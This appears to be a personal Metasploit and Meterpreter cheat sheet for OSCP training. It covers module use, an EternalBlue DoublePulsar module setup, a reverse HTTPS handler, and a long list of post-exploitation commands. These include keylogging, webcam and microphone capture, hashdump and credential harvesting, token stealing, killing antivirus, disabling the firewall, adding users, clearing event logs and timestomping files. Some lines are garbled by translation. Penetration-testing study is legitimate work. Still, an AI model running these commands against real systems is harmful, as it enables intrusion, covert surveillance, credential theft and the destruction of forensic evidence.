
See Metasploit Unleashed Course

Search for exploits using Metasploit GitHub framework source code: Translate them for use on OSCP LAB or EXAM.

Metasploit MetaSploit requires Postfresql systemctl start postgresql

To enable Postgresql on startup systemctl enable postgresql

MSF Syntax Start metasploit msfconsole msfconsole -q

Show help for command show -h

Show Auxiliary modules show auxiliary

Use a module use auxiliary/scanner/snmp/snmp_enum use auxiliary/scanner/http/webdav_scanner use auxiliary/scanner/smb/smb_version use auxiliary/scanner/ftp/ftp_login use exploit/windows/pop3/seattlelab_pass

Show the basic information for a module info

Show the configuration parameters for a module show options

Set options for a module set RHOSTS set THREADS 10

Run the module run

Execute an Exploit exploit

Search for a module search type:auxiliary login

Metasploit Database Access Show all hosts discovered in the MSF database hosts

Scan for hosts and store them in the MSF database db_nmap

Search machines for specific ports in MSF database services -p 443

Leverage MSF database to scan SMB ports (auto-completed rhosts) services -p 443 --rhosts

You may find some boxes that are vulnerable to MS17-010 (AKA. EternalBlue). Although, not offically part of the indended course, this exploit can be leveraged to gain SYSTEM level access to a Windows box. I have never had much luck using the built in Metasploit EternalBlue module. I found that the elevenpaths version works much more relabily. Here are the instructions to install it taken from the following YouTube video:

  1. First step is to configure the Kali to work with wine 32bit

dpkg --add-architecture i386 && apt-get update && apt-get install wine32 rm -r ~/.wine wine cmd.exe exit

  1. Download the exploit repostory

  2. Move the exploit to /usr /share /metasploit-framework /modules /exploits /windows /smb

  3. Start metasploit console (spoolsv.exe as the PROCESSINJECT yielded results on OSCP boxes.)

use exploit/windows/smb/eternalblue_doublepulsar msf exploit(eternalblue_doublepulsar) > set RHOST RHOST => msf exploit(eternalblue_doublepulsar) > set PROCESSINJECT spoolsv.exe PROCESSINJECT => spoolsv.exe msf exploit(eternalblue_doublepulsar) > run

Experimenting with Meterpreter

Get system information from Meterpreter Shell sysinfo

Get user id from Meterpreter Shell getuid

Search for a file search -f *pass*.txt

Upload a file upload /usr/share/windows-binaries/nc.exe c:\\Users\\Offsec

Download a file download c:\\Windows\\system32\\calc.exe /tmp/calc.exe

Invoke a command shell from Meterpreter Shell shell

Exit the meterpreter shell exit

Metasploit Exploit Multi Handler multi/handler to accept an incoming reverse_https_meterpreter

payload use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_https set LHOST $ip set LPORT 443 exploit [*] Started HTTPS reverse handler on https://$ip:443/ Building Your Own MSF Module mkdir -p ~/.msf4/modules/exploits/linux/misc cd ~/.msf4/modules/exploits/linux/misc cp /usr/share/metasploitframework/modules/exploits/linux/misc/gld\_postfix.rb ./crossfire.rb nano crossfire.rb

Post Exploitation with Metasploit - (available options depend on OS and Meterpreter Cababilities) - download Download a file or directory upload Upload a file or directory portfwd Forward a local port to a remote service route View and modify the routing table keyscan_start Start capturing keystrokes keyscan_stop Stop capturing keystrokes screenshot Grab a screenshot of the interactive desktop record_mic Record audio from the default microphone for X seconds webcam_snap Take a snapshot from the specified webcam getsystem Attempt to elevate your privilege to that of local system. hashdump Dumps the contents of the SAM database

Baisc system commands

background # placed in the background of the current session Sessions # Sessions to see -h help sessions -i # kill -k session into the session bgrun / RUN # implementation of the existing module, double-click the tab enter the run, has been listed Some scripts info # View existing module information getuid # View current user identity getprivs # View current user permissions getpid # Get current process ID (PID) sysinfo # View target machine system information irb # Open ruby terminal ps # View is running Process
kill # Kill the specified PID process idletime # View target idle time reboot / shutdown # Restart / Shutdown shell # Enter target cmd shell

Common cmd commands

Whoami # Current privilege quser # Query current online administrator net user # View existing user net user username/password/add # Add user and corresponding password net localgroup User group name username/add # Add the specified user to the specified user group netstat -ano # Query the current network connection communication in the computer, LISTENING indicates that the port is in the listening state; ESTABLISHED indicates that the port is in the working (communication) state systeminfo # View the details of the current computer tasklist /svc # View each process corresponding to services taskkill / f / im program name # name of the end of a specified program taskkill / f / PID ID # end of a specified process PID tasklist | findstr "string" # Find content specified output logoff # cancellation of a Specify the user's ID shutdown -r # Restart the current computer netsh adcfirewall setAllprofiles state off # Turn off the firewall

Uictl switch keyboard / mouse

Uictl [ enable/disable ] [ keyboard/mouse/all ] # enable or disable keyboard/mouse uictl disable mouse # disable mouse uictl disable keyboard # disable keyboard

Execute executable file

the Execute # executable file on the target machine execute -H -i -f cmd.exe create a new process cmd.exe #, -H invisible, -i interactive execute -H -m -d notepad.exe -f payload.exe - a "-o hack.txt"

-d Process name displayed during execution of the target host (for masquerading) -m Direct execution from memory

"-o hack.txt" is the running parameter of payload.exe

Migrate process migration

Getpid # Get the current process's pid ps # View the current active process migrate # Migrate the Meterpreter session to the specified pid value in the process kill #kill the process

Clearav clear log

Clearav # Clear application logs, system logs, security logs in windows

Timestomp forged timestamp

Timestomp C: \ -h
View help timestomp -v C: \ 2 .txt
View timestamp timestomp C: \ 2 .txt -f C: \ 1 .txt #Copy the timestamp of 1.txt Give 2. txt timestomp c: \ test \ 22 .txt -z "03/10/2019 11:55:55" -v # Set the four properties to uniform time

Portfwd port forwarding

Portfwd add -l 1111 -p 3389 -r 127 .0.0.1 #Forward the 3389 port of the target machine to the local port 1111 rdesktop 127 .0.0.1:1111 # Need to enter the username and password to connect rdesktop -u Administrator -p 123 127 .0.0.1:1111 # -u username -p password

Autoroute add route

run autoroute -h # View help run get_local_subnets # View target intranet segment address run autoroute -s 192 .168.183.0/24 # Add target network segment route run autoroute -p # View added route run post/windows/gather/arp_scanner RHOSTS = 192 .168.183.0/24 run auxiliary/scanner/portscan/tcp RHOSTS = 192 .168.183.146 PORTS = 3389

Socks agent

Reference: use auxiliary/server/socks4a set srvhost 127 .0.0.1 set srvport 2000 run

Common script

Run arp_scanner -r 192 .168.183.1/24 # Use arp for surviving host scan run winenum # automate some detection scripts run credcollect # get user hash run domain_list_gen # get domain management account list run post/multi/gather/env # get User environment variable run post/windows/gather/enum_logged_on_users -c # List current login user run post/linux/gather/checkvm # virtual machine run post/windows/gather/checkvm # virtual machine run post/windows/gather/ Forensics/enum_drives # View memory information run post/windows/gather/enum_applications # Get installation software information run post/windows/gather/dumplinks # Get recently accessed documents, link information run post/windows/gather/enum_ie # Get IE cache run post/windows/gather/enum_firefox # Get firefox cache run post/windows/gather/enum_chrome # Get Chrome cache run post/multi/recon/local_exploit_suggester # Get local privilege vulnerability run post/windows/gather/enum_patches # Get patch information run post/windows/gather/enum_domain # Find domain control run post/windows/gather/enum_snmp # Get snmp community name run post/windows/gather/credentials/vnc # Get vnc password run post/windows/wlan/ Wlan_profile # Used to read the target host WiFi password run post/multi/gather/wlan_geolocate # Based on wlan, the location confirmation file is located at /root/.msf4/loot run post/windows/manage/killav close antivirus software

Common crack module

Auxiliary/scanner/mssql/mssql_login Auxiliary/scanner/ftp/ftp_login Auxiliary/scanner/ssh/ssh_login Auxiliary/scanner/telnet/telnet_login Auxiliary/scanner/smb/smb_login Auxiliary/scanner/mssql/mssql_login Auxiliary/scanner/mysql/mysql_login Auxiliary/scanner/oracle/oracle_login Auxiliary/scanner/postgres/postgres_login Auxiliary/scanner/vnc/vnc_login Auxiliary/scanner/pcanywhere/pcanywhere_login Auxiliary/scanner/snmp/snmp_login Auxiliary/scanner/ftp/anonymous


Keyscan_start # Start key record keyscan_dump # Export record data keyscan_stop # End key record

Sniffer capture package

Use sniffer Sniffer_interfaces # View NIC sniffer_start 1 # Select NIC 1 to start capturing sniffer_stats 1 # View NIC 1 status sniffer_dump 1 /tmp/wlan1.pcap # Export pcap packet sniffer_stop 1 # Stop NIC 1 capture sniffer_release 1 # Release NIC 1 traffic


record_mic  # audio recording webcam_chat # open a video chat (the other party pop) webcam_list # view camera webcam_snap # through the camera to take pictures webcam_stream # open by video surveillance cameras (to monitor ≈ live as a web page)

Screen capture

Screenshot # Screenshots use espia # Use espia module screengrab # screenshot

Getgui command

run getgui –h # View help run getgui -e # Open remote desktop run getgui -u admin -p admin # Add user run getgui -f 6666 -e # 3389 port forward to 6666


? - help menu background - moves the current session to the background bgkill - kills a background meterpreter script bglist - provides a list of all running background scripts bgrun - runs a script as a background thread channel - displays active channels close - closes a channel exit - terminates a meterpreter session help - help menu interact - interacts with a channel irb - go into Ruby scripting mode migrate - moves the active process to a designated PID quit - terminates the meterpreter session read - reads the data from a channel run - executes the meterpreter script designated after it use - loads a meterpreter extension write - writes data to a channel


cat - read and output to stdout the contents of a file cd - change directory on the victim del - delete a file on the victim download - download a file from the victim system to the attacker system edit - edit a file with vim getlwd - print the local directory getwd - print working directory lcd - change local directory lpwd - print local directory ls - list files in current directory mkdir - make a directory on the victim system pwd - print working directory rm - delete a file rmdir - remove directory on the victim system upload - upload a file from the attacker system to the victim


ipconfig - displays network interfaces with key information including IP address, etc. portfwd - forwards a port on the victim system to a remote service route - view or modify the victim routing table


clearav - clears the event logs on the victim's computer drop_token - drops a stolen token execute - executes a command getpid - gets the current process ID (PID) getprivs - gets as many privileges as possible getuid - get the user that the server is running as kill - terminate the process designated by the PID ps - list running processes reboot - reboots the victim computer reg - interact with the victim's registry rev2self - calls RevertToSelf() on the victim machine shell - opens a command shell on the victim machine shutdown - shuts down the victim's computer steal_token - attempts to steal the token of a specified (PID) process sysinfo - gets the details about the victim computer such as OS and name

User Interface Commands

enumdesktops - lists all accessible desktops getdesktop - get the current meterpreter desktop idletime - checks to see how long since the victim system has been idle keyscan_dump - dumps the contents of the software keylogger keyscan_start - starts the software keylogger when associated with a process such as Word or browser keyscan_stop - stops the software keylogger screenshot - grabs a screenshot of the meterpreter desktop set_desktop - changes the meterpreter desktop uictl - enables control of some of the user interface components


getsystem - uses 15 built-in methods to gain sysadmin privileges


hashdump - grabs the hashes in the password (SAM) file


timestomp - manipulates the modify, access, and create attributes of a file